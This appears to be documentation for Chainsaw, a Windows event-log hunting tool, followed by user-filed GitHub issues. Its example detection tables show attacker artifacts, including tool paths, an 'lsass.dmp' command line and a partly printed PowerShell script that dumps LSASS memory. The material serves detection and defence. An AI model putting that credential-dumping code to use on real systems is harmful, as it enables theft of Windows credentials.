│ 2021-01-26 13:21:14 │ 1  │ ‣ Non Interactive PowerShell             │ "LAPTOP-JU4M3I0E"              │ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh │ powershell.exe  start-process notepad.exe          │
│                     │    │                                          │                                │ ell.exe                                            │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-04-20 20:32:55 │ 1  │ ‣ Non Interactive PowerShell             │ "MSEDGEWIN10"                  │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │
│                     │    │                                          │                                │ ell.exe                                            │ hell.exe" -Version 5.1 -s -NoLogo -NoProfile       │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-04-20 20:33:13 │ 1  │ ‣ Suspicious Svchost Process             │ "MSEDGEWIN10"                  │ C:\Windows\System32\svchost.exe                    │ C:\Windows\system32\svchost.exe -k netsvcs -p -s g │
│                     │    │ ‣ Windows Processes Suspicious           │                                │                                                    │ psvc                                               │
│                     │    │ Parent Directory                         │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-04-20 20:33:14 │ 1  │ ‣ Suspicious Svchost Process             │ "MSEDGEWIN10"                  │ C:\Windows\System32\svchost.exe                    │ C:\Windows\system32\svchost.exe -k LocalService -p │
│                     │    │ ‣ Windows Processes Suspicious           │                                │                                                    │  -s fdPHost                                        │
│                     │    │ Parent Directory                         │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-04-22 22:09:26 │ 1  │ ‣ Windows Processes Suspicious           │ "MSEDGEWIN10"                  │ C:\Windows\System32\services.exe                   │ C:\Windows\system32\services.exe 652 "lsass.dmp" a │
│                     │    │ Parent Directory                         │                                │                                                    │ 708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v              │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-04-22 22:09:35 │ 1  │ ‣ Suspicious Svchost Process             │ "MSEDGEWIN10"                  │ C:\Windows\System32\svchost.exe                    │ C:\Windows\system32\svchost.exe -k LocalService -p │
│                     │    │ ‣ Windows Processes Suspicious           │                                │                                                    │  -s fdPHost                                        │
│                     │    │ Parent Directory                         │                                │                                                    │                                                    │
└─────────────────────┴────┴──────────────────────────────────────────┴────────────────────────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘

[+] Detection: Suspicious File Creation
┌─────────────────────┬────┬────────────────────────────────┬────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐
│     system_time     │ id │        detection_rules         │       computer_name        │           Event.EventData.TargetFilename           │                       image                        │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-05-14 14:04:05 │ 11 │ ‣ Hijack Legit RDP Session     │ "alice.insecurebank.local" │ C:\Users\administrator\AppData\Roaming\Microsoft\W │ C:\Windows\system32\mstsc.exe                      │
│                     │    │ to Move Laterally              │                            │ indows\Start Menu\Programs\Startup\cmd.exe         │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 14:45:31 │ 11 │ ‣ Startup Folder File Write    │ "MSEDGEWIN10"              │ C:\ProgramData\Microsoft\Windows\Start Menu\Progra │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │
│                     │    │                                │                            │ ms\StartUp\Notepad.lnk                             │ ell.exe                                            │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-02-10 08:28:12 │ 11 │ ‣ Execution from Suspicious    │ "MSEDGEWIN10"              │ C:\Windows\System32\drivers\VBoxDrv.sys            │ c:\Users\Public\BYOV\TDL\Furutaka.exe              │
│                     │    │ Folder                         │                            │                                                    │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-07-03 08:47:21 │ 11 │ ‣ Suspicious Desktopimgdownldr │ "MSEDGEWIN10"              │ C:\Users\IEUser\AppData\Local\Temp\Personalization │ C:\Windows\System32\svchost.exe                    │
│                     │    │ Target File                    │                            │ \LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc3 │                                                    │
│                     │    │                                │                            │ 19JaA.7z                                           │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-17 11:43:33 │ 11 │ ‣ Execution from Suspicious    │ "MSEDGEWIN10"              │ C:\Users\IEUser\AppData\Roaming\WINWORD.exe        │ C:\Users\Public\tools\apt\wwlib\test.exe           │
│                     │    │ Folder                         │                            │                                                    │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-17 11:43:33 │ 11 │ ‣ Execution from Suspicious    │ "MSEDGEWIN10"              │ C:\Users\IEUser\AppData\Roaming\wwlib.dll          │ C:\Users\Public\tools\apt\wwlib\test.exe           │
│                     │    │ Folder                         │                            │                                                    │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-23 21:57:34 │ 11 │ ‣ Execution from Suspicious    │ "MSEDGEWIN10"              │ C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_r │ c:\Users\Public\test.tmp                           │
│                     │    │ Folder                         │                            │ ar_sfx_access_check_2914968                        │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-23 21:57:34 │ 11 │ ‣ Execution from Suspicious    │ "MSEDGEWIN10"              │ C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948    │ c:\Users\Public\test.tmp                           │
│                     │    │ Folder                         │                            │                                                    │                                                    │
├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-11-26 17:38:11 │ 11 │ ‣ Execution from Suspicious    │ "LAPTOP-JU4M3I0E"          │ C:\Users\Public\tools\privesc\uac\system32\npmprox │ C:\Users\Public\tools\privesc\uac\byeintegrity5-ua │
│                     │    │ Folder                         │                            │ y.dll                                              │ c.exe                                              │
└─────────────────────┴────┴────────────────────────────────┴────────────────────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘


[+] Detection: Windows Defender Detections
┌─────────────────────┬──────┬───────────────┬───────────────────────────────────┬────────────────────────────────────────────────────┬───────────────────────┐
│     system_time     │  id  │   computer    │            threat_name            │                    threat_file                     │         user          │
├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤
│ 2019-07-18 20:40:00 │ 1116 │ "MSEDGEWIN10" │ "Trojan:PowerShell/Powersploit.M" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │
│                     │      │               │                                   │ atomics\\T1056\\Get-Keystrokes.ps1"                │                       │
├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤
│ 2019-07-18 20:40:16 │ 1116 │ "MSEDGEWIN10" │ "Trojan:XML/Exeselrun.gen!A"      │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │
│                     │      │               │                                   │ atomics\\T1086\\payloads\\test.xsl"                │                       │
├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤
│ 2019-07-18 20:41:16 │ 1116 │ "MSEDGEWIN10" │ "HackTool:JS/Jsprat"              │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │
│                     │      │               │                                   │ atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)"       │                       │
├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤
│ 2019-07-18 20:41:17 │ 1116 │ "MSEDGEWIN10" │ "Backdoor:ASP/Ace.T"              │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │
│                     │      │               │                                   │ atomics\\T1100\\shells\\cmd.aspx"                  │                       │
├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤
│ 2019-07-18 20:41:48 │ 1116 │ "MSEDGEWIN10" │ "Trojan:Win32/Sehyioa.A!cl"       │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │
│                     │      │               │                                   │ atomics\\T1218\\src\\Win32\\T1218-2.dll"           │                       │
├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤
│ 2019-07-18 20:51:50 │ 1116 │ "MSEDGEWIN10" │ "HackTool:JS/Jsprat"              │ "containerfile:_C:\\AtomicRedTeam\\atomic-red-team │ "MSEDGEWIN10\\IEUser" │
│                     │      │               │                                   │ -master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\ │                       │
│                     │      │               │                                   │ AtomicRedTeam\\atomic-red-team-master\\atomics\\T1 │                       │
│                     │      │               │                                   │ 100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\Atomic │                       │
│                     │      │               │                                   │ RedTeam\\atomic-red-team-master\\atomics\\T1100\\s │                       │
│                     │      │               │                                   │ hells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTea │                       │
│                     │      │               │                                   │ m\\atomic-red-team-master\\atomics\\T1100\\shells\ │                       │
│                     │      │               │                                   │ \b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\ato │                       │
│                     │      │               │                                   │ mic-red-team-master\\atomics\\T1100\\shells\\b.jsp │                       │
│                     │      │               │                                   │ ->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-re │                       │
│                     │      │               │                                   │ d-team-master\\atomics\\T1100\\shells\\b.jsp->(SCR │                       │
│                     │      │               │                                   │ IPT0068)"                                          │                       │
└─────────────────────┴──────┴───────────────┴───────────────────────────────────┴────────────────────────────────────────────────────┴───────────────────────┘

[+] Detection: Suspicious Image Load
┌─────────────────────┬────┬─────────────────────────────┬───────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐
│     system_time     │ id │       detection_rules       │ computer_name │               Event.EventData.Image                │                    image_loaded                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-27 18:47:00 │ 7  │ ‣ Execution from Suspicious │ "IEWIN7"      │ C:\Users\Public\KeeFarce.exe                       │ C:\Users\Public\BootstrapDLL.dll                   │
│                     │    │ Folder                      │               │                                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-05-18 17:16:18 │ 7  │ ‣ In-memory PowerShell      │ "IEWIN7"      │ C:\Windows\System32\notepad.exe                    │ C:\Windows\assembly\NativeImages_v2.0.50727_32\Sys │
│                     │    │                             │               │                                                    │ tem.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e │
│                     │    │                             │               │                                                    │ \System.Management.Automation.ni.dll               │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-05-23 17:26:08 │ 7  │ ‣ XSL Script Processing     │ "IEWIN7"      │ \\vboxsrv\HTools\msxsl.exe                         │ C:\Windows\System32\msxml3.dll                     │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-06-14 22:22:31 │ 7  │ ‣ WMI Modules Loaded        │ "IEWIN7"      │ C:\Users\IEUser\Downloads\a.exe                    │ C:\Windows\System32\wbem\wmiutils.dll              │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-06-14 22:23:26 │ 7  │ ‣ WMI Modules Loaded        │ "IEWIN7"      │ C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\B │ C:\Windows\System32\wbem\wmiutils.dll              │
│                     │    │                             │               │ RE6BgE2JubB.exe                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-08-30 12:54:08 │ 7  │ ‣ WMI Modules Loaded        │ "MSEDGEWIN10" │ C:\Windows\System32\cscript.exe                    │ C:\Windows\System32\wbem\wmiutils.dll              │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-08-02 16:24:07 │ 7  │ ‣ Fax Service DLL Search    │ "MSEDGEWIN10" │ C:\Windows\System32\FXSSVC.exe                     │ C:\Windows\System32\Ualapi.dll                     │
│                     │    │ Order Hijack                │               │                                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-15 13:17:02 │ 7  │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\tendyron.exe             │ C:\Users\Public\tools\apt\OnKeyToken_KEB.dll       │
│                     │    │ Folder                      │               │                                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-17 11:43:28 │ 7  │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe           │ C:\Users\Public\tools\apt\wwlib\wwlib.dll          │
│                     │    │ Folder                      │               │                                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-17 11:43:28 │ 7  │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe           │ C:\Users\Public\tools\apt\wwlib\wwlib.dll          │
│                     │    │ Folder                      │               │                                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-17 11:43:31 │ 7  │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe           │ C:\Users\Public\tools\apt\wwlib\wwlib.dll          │
│                     │    │ Folder                      │               │                                                    │                                                    │
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-10-17 11:43:31 │ 7  │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe           │ C:\Users\Public\tools\apt\wwlib\wwlib.dll          │
│                     │    │ Folder                      │               │                                                    │                                                    │
└─────────────────────┴────┴─────────────────────────────┴───────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘

[+] Detection: Suspicious Powershell ScriptBlock
┌─────────────────────┬──────┬──────────────────────────┬───────────────┬────────────────────────────────────────────────────┐
│     system_time     │  id  │     detection_rules      │ computer_name │          Event.EventData.ScriptBlockText           │
├─────────────────────┼──────┼──────────────────────────┼───────────────┼────────────────────────────────────────────────────┤
│ 2020-06-30 14:24:08 │ 4104 │ ‣ PowerShell Get-Process │ "MSEDGEWIN10" │ function Memory($path){  $Process = Get-Process ls │
│                     │      │ LSASS in ScriptBlock     │               │ ass$DumpFilePath = $path$WER = [PSObject].Assembly │
│                     │      │                          │               │ .GetType('System.Management.Automation.WindowsErro │
│                     │      │                          │               │ rReporting')$WERNativeMethods = $WER.GetNestedType │
│                     │      │                          │               │ ('NativeMethods', 'NonPublic')$Flags = [Reflection │
│                     │      │                          │               │ .BindingFlags] 'NonPublic, Static'$MiniDumpWriteDu │
│                     │      │                          │               │ mp = $WERNativeMethods.GetMethod('MiniDumpWriteDum │
│                     │      │                          │               │ p', $Flags)$MiniDumpWithFullMemory = [UInt32] 2 #$ │
│                     │      │                          │               │ ProcessId = $Process.Id$ProcessName = $Process.Nam │
│                     │      │                          │               │ e$ProcessHandle = $Process.Handle$ProcessFileName  │
│                     │      │                          │               │ = "$($ProcessName).dmp"$ProcessDumpPath = Join-Pat │
│                     │      │                          │               │ h $DumpFilePath $ProcessFileName$FileStream = New- │
│                     │      │                          │               │ Object IO.FileStream($ProcessDumpPath, [IO.FileMod │
│                     │      │                          │               │ e]::Create) $Result = $MiniDumpWriteDump.Invoke($n │
│                     │      │                          │               │ ull, @($ProcessHandle,$ProcessId,$FileStream.SafeF │
│                     │      │                          │               │ ileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[ │
│                     │      │                          │               │ IntPtr]::Zero,[IntPtr]::Zero)) $FileStream.Close() │
│                     │      │                          │               │ if (-not $Result){$Exception = New-Object Componen │
│                     │      │                          │               │ tModel.Win32Exception$ExceptionMessage = "$($Excep │
│                     │      │                          │               │ tion.Message) ($($ProcessName):...                 │
│                     │      │                          │               │                                                    │
│                     │      │                          │               │ (use --full to show all content)                   │
└─────────────────────┴──────┴──────────────────────────┴───────────────┴────────────────────────────────────────────────────┘

[+] Detection: System log was cleared
┌─────────────────────┬─────┬───────────────────────────────────┬──────────────┐
│     system_time     │ id  │             computer              │ subject_user │
├─────────────────────┼─────┼───────────────────────────────────┼──────────────┤
│ 2019-03-19 23:34:25 │ 104 │ "PC01.example.corp"               │ "user01"     │
├─────────────────────┼─────┼───────────────────────────────────┼──────────────┤
│ 2020-09-15 19:28:31 │ 104 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"   │
└─────────────────────┴─────┴───────────────────────────────────┴──────────────┘

[+] Detection: New User Created
┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┬──────────────────────────────────────────────────┐
│     system_time     │  id  │             computer              │ target_username │                     user_sid                     │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┼──────────────────────────────────────────────────┤
│ 2020-09-16 09:31:19 │ 4720 │ "01566s-win16-ir.threebeesco.com" │ "$"             │ "S-1-5-21-308926384-506822093-3341789130-107103" │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┼──────────────────────────────────────────────────┤
│ 2020-09-16 09:32:13 │ 4720 │ "01566s-win16-ir.threebeesco.com" │ "$"             │ "S-1-5-21-308926384-506822093-3341789130-107104" │
└─────────────────────┴──────┴───────────────────────────────────┴─────────────────┴──────────────────────────────────────────────────┘

[+] Detection: User added to interesting group
┌─────────────────────┬──────┬───────────────┬───────────────────────────┬─────────────────────────────────────────────────┬──────────────────┐
│     system_time     │  id  │   computer    │        change_type        │                    user_sid                     │   target_group   │
├─────────────────────┼──────┼───────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤
│ 2019-09-22 11:22:05 │ 4732 │ "MSEDGEWIN10" │ User added to local group │ "S-1-5-21-3461203602-4096304019-2269080069-501" │ "Administrators" │
├─────────────────────┼──────┼───────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤
│ 2019-09-22 11:23:19 │ 4732 │ "MSEDGEWIN10" │ User added to local group │ "S-1-5-20"                                      │ "Administrators" │
└─────────────────────┴──────┴───────────────┴───────────────────────────┴─────────────────────────────────────────────────┴──────────────────┘

Acknowledgements

Comments
  • Sigma.csv Formatting

    Sigma.csv Formatting

    In version 2.0.0-beta.2 - There appears to be a formatting issue with the sigma.csv file. In the "Event Data" column the data appears as blank or as "---" due to formatting and a few carriage returns. When processing the same data with the older version 1.1.7 the formatting issue didn't show up since I believe that the "sigma.csv" might be a new report

    Example Showing how it displays in Timeline Explorer: ![image](https://user-images.githubusercontent.com/44442120/180433261-8b83c62f-0d1b-4281-b80d-34d37d18b6f5.png)

    Example showing copy of sanitized data within one of the rows in that column: ![image](https://user-images.githubusercontent.com/44442120/180433850-0601dac7-7291-431b-b79b-5fbf94859095.png)

    opened by b1draper 17
  • thread

    thread "main" panicked when trying to use custom rules in `hunt` mode

    Hello, I downloaded the release version of chainsaw and it's running smoothly using sigma-rules from SigmaHQ, which is great. But once I use custom rules from another repository, it threw an error. I'm not sure where the error come from, but it became an issue when I'm trying to use custom rule.

    PS> chainsaw.exe hunt <evtx location> -r <custom rules location> -m ".\mapping_files\sigma-mapping.yml"
    ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
    ██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
    ██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
    ██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
    ╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
     ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
        By F-Secure Countercept (Author: @FranticTyping)
    
    [+] Found 231 EVTX files
    [+] Converting detection rules...
    thread 'main' panicked at 'removal index (is 0) should be < len (is 0)', library\alloc\src\vec\mod.rs:1385:13
    note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
    

    Is the mapping incompatibility become an issue?

    bug 
    opened by rareguy 14
  • --json output path not working for hunts

    --json output path not working for hunts

    I'm trying to generate a json output file. Unfortuanttly it seems not to work because it's not allowed to add a path after --json like --json C:\TEMP\test.json

    Expected behavior: If I'm running the command: chainsaw.exe" hunt C:\Windows\System32\winevt\Logs --rules "C:\xyz\xyz\xyz\chainsaw\sigma_rules" --mapping "xyz\xyz\xyz\chainsaw\mapping_files\sigma-mapping.yml --json C:\xyz\xyz\xyz\chainsaw\output.json I would execpet in the folder C:\xyz\xyz\xyz\chainsaw\ the output.json.

    Actual behavior If I'm running the command: chainsaw.exe" hunt C:\Windows\System32\winevt\Logs --rules "C:\xyz\xyz\xyz\chainsaw\sigma_rules" --mapping "xyz\xyz\xyz\chainsaw\mapping_files\sigma-mapping.yml --json C:\xyz\xyz\xyz\chainsaw\output.json

    I get the following "error" dialog: error: Found argument 'C:\xyz\xyz\xyz\chainsaw\output.json' which wasn't expected, or isn't valid in this context

    If I'm running it without a path like: chainsaw.exe" hunt C:\Windows\System32\winevt\Logs --rules "C:\xyz\xyz\xyz\chainsaw\sigma_rules" --mapping "xyz\xyz\xyz\chainsaw\mapping_files\sigma-mapping.yml --json

    Its working but prints the json in the console which is not what I expect from this paramter.

    Could you maybe have a look on it?

    Thanks already and many greetings

    documentation 
    opened by 0x90v1 8
  • Hunger of memory, out of memory bash error code 137

    Hunger of memory, out of memory bash error code 137

    In version 2.x I,m experiencing a out of memory issue. When i I analyze more that 3-4 files it start eating RAM memory. It's so hungy: obraz

    Issue reproduce:

    └─$ ~/git/chainsaw/chainsaw hunt ./dc-2/Logs -r ~/git/chainsaw/rules -s ~/git/chainsaw/sigma_rules -m ~/git/chainsaw/mappings/sigma-event-logs-all.yml --full --column-width 320 -o suspect_logs.dc-2.log
    
     ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
    ██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
    ██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
    ██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
    ╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
     ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
        By F-Secure Countercept (@FranticTyping, @AlexKornitzer)
    
    [+] Loading detection rules from: /home/ubuntu/git/chainsaw/rules, /home/ubuntu/git/chainsaw/sigma_rules
    [+] Loaded 7064 detection rules (782 not loaded)
    [+] Loading event logs from: ./dc-2/Logs (extensions: .evtx)
    [+] Loaded 24 EVTX files (3.1 GB)
    [+] Hunting: [==========>-----------------------------] 6/24 ⠴
    zsh: killed     ~/git/chainsaw/chainsaw hunt ./dc-2/Logs -r ~/git/chainsaw/rules -s  -m
    
    
    ┌─[2022-09-23 23:57:41]─(ubuntu㉿ubuntu)─[/srv]
    └─$ echo $? 
    137
    

    Monitor term in hunt time:

    ┌─[2022-09-23 23:50:36]─(ubuntu㉿ubuntu)─[/srv]
    └─$ free -h
                   full       used       free    shared   buf/cache    avaliable
    Memory:       31Gi        30Gi        229Mi       307Mi       3,7Gi        1,2Gi
    SWAP:          0B          0B          0B   
    

    I think, the problem is with reporting detection. It's keep it in memory and after finish all analyze it push it to file. With one or 2-3 files is fine, but if we analyze multiple files there out of memory is possible. I think it should push result to file each confirmed hunt

    opened by KRUXLEX 7
  • Add sigma metadatas in results

    Add sigma metadatas in results

    It would be really nice to have sigma metadatas (especially level and tags) directly in the json output file.

    This would be usefull when indexing results in a SIEM !

    Thanks

    opened by jurelou 7
  • chrono-tz phf dependency

    chrono-tz phf dependency

    Trying to compile this in Kali 5.5.0-kali2-amd64 and getting the error below. I tried deleting the ./cargo/registry folder according to this https://blog.illixion.com/2021/10/fix-failed-to-select-a-version-cargo/ but that yielded the same results. Is this a Kali repository issue?

    failed to select a version fort he requirment 'phf = "=0.11.1"candidate versions found which didn't match: 0.10.1, 0.10.0, 0.9.0, ... location searched: crates.io index required by package 'chrono-tz v0.6.3 ... which satisfies dependency 'chrono-tz = "0.6.3"` of package 'chain saw v2.1.0

    opened by chronocrate 6
  • Support for WEF/WEC ForwardedEvents.evtx

    Support for WEF/WEC ForwardedEvents.evtx

    Request to add support for WEF/WEC ForwardedEvents.evtx files. Chainsaw seems to process such files, but no results are shown for searches or hunts. See examples below:

    image

    image

    image

    bug 
    opened by einarssonm 6
  • CSV Encoding

    CSV Encoding

    Awesome tool...thx for sharing with the community!

    The CSV output should be in UTF8. Please fix this with your next release. Thank you!

    I processed EVTX files from a French system and a lot of characters were bogus. JSON output looked fine.

    Cheers!

    opened by evild3ad 6
  • Is it possible to parse .json/.jsonl files that contain other log formats?

    Is it possible to parse .json/.jsonl files that contain other log formats?

    Hey, I hope my question isn't badly phrased or has already been asked.

    I am trying to obtain sigma hits for logs produced by a simulated network. Problem is that those are not in the .evtx format whatsoever, instead relevant logs from windows machines are collected by winlogbeat and then sent to an elasticsearch instance running on a separate Ubuntu server, from which they are extracted and then - at least in theory - analyzed.

    A single event may look like the following

    {
      "@timestamp": "2022-08-23T11:16:15.205Z",
      "agent": {
        "ephemeral_id": "e4ab12df-8c99-42e8-a157-b21175cd4141",
        "hostname": "CLIENT2",
        "id": "27aaa960-47e5-483a-a4b7-487e0ae70d81",
        "name": "CLIENT2",
        "type": "winlogbeat",
        "version": "7.10.2"
      },
      "destination": {
        "domain": "-",
        "ip": "x.x.x.x",
        "port": 25
      },
      "ecs": {
        "version": "1.5.0"
      },
      "event": {
        "action": "Network connection detected (rule: NetworkConnect)",
        "category": ["network"],
        "code": 3,
        "created": "2022-08-23T11:16:17.337Z",
        "kind": "event",
        "module": "sysmon",
        "provider": "Microsoft-Windows-Sysmon",
        "type": ["connection", "start", "protocol"]
      },
      "host": {
        "name": "CLIENT2.breach.local"
      },
      "log": {
        "level": "information"
      },
      [...]
    }
    

    (Formatted for some readability, the actual files are in .jsonl format aka contain several thousand events).

    Is it possible to use chainsaw to parse data like this? As of right now, Chainsaw tells me it cannot find any event logs in the .jsonl files I provide. I suspect that I need to adapt the mapping file in some way, but I am not quire sure how.

    Kind regards, Philipp

    enhancement 
    opened by Maspital 5
  • EventID in Sigma Rules not matching (String vs Numeric)

    EventID in Sigma Rules not matching (String vs Numeric)

    Most sigma rules use numeric EventID - i.e.:

    detection:
        selection:
            EventID: 7045
            ServiceName:
                - 'srservice'
                - 'ipvpn'
                - 'hkmsvc'
        condition: selection

    modules.rs [line 215] however converts the EventID to a String

    doc["EventID"] = json!(event_id.to_string());

    and the condition (EventID: 7045) is therefore not met. After removing the conversion to String (or rewriting the Sigma Rule to EventID: "7045") the Event is successfully matched:

    doc["EventID"] = json!(event_id);
    bug 
    opened by stdio-h 5
  • Evtx files with different extension

    Evtx files with different extension

    I can see that chainsaw only supports files with evtx extension. https://github.com/countercept/chainsaw/blob/master/src/util.rs#L56

    Would it be possible to add a command line argument to check for a different file extension ?

    thanks !

    opened by jurelou 4
  • Definition of

    Definition of "logsource" values like product or category.

    Hey,

    I am currently using chainsaw + SIGMA to evaluate log datasets and stumbled upon the following issue: Certain SIGMA rules produce an abnormally high number of false positives, to the point where I suspect that it just triggers on most events. The rule in question is

    title: Sysmon Blocked Executable
    id: 23b71bc5-953e-4971-be4c-c896cda73fc2
    description: Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set
    status: experimental
    author: Nasreddine Bencherchali
    date: 2022/08/16
    references:
        - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e
    tags:
        - attack.defense_evasion
    logsource:
        product: windows
        category: file_block
    detection:
        selection:
            Image: '*'
        condition: selection
    falsepositives:
        - Unlikely
    level: high
    

